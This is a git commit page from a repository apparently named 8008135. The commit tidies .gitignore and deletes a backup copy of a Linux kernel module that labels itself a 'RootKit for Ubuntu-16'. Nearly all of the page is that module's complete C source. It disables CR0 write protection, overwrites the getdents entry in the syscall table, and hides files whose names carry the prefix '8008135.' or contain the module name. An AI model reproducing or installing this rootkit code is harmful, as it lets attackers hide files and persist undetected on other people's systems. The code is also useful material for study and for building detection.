valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

.gitignore fix 2

Browse Source
This commit is contained in:
Jan Koerner 2019-11-18 18:10:56 +01:00
parent 2d55415f24
commit 4d67932c00
2 changed files with 1 additions and 96 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored
View File

@ -1,3 +1,3 @@
/.anjuta/ /.anjuta/
/.anjuta_sym_db.db /.anjuta_sym_db.db
*~

95
8008135.c~
View File

@ -1,95 +0,0 @@
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kallsyms.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "sysgen.h"
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
MODULE_AUTHOR("JKE");
MODULE_LICENSE("GPL v2");
MODULE_DESCRIPTION("RootKit for Ubuntu-16");
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
sys_getdents_t sys_getdents_orig = NULL;
// our new getdents handler
asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it
// remove this entry by copying everything after it forward
memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
// and adjust the length reported
ret -= ent->d_reclen;
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
static int __init lkm_example_init(void) {
printk(KERN_INFO "Hello, World!\n");
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "New syscall in place\n");
return 0;
}
static void __exit lkm_example_exit(void) {
printk(KERN_INFO "Goodbye, World!\n");
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "Old syscall back\n");
}
module_init(lkm_example_init);
module_exit(lkm_example_exit);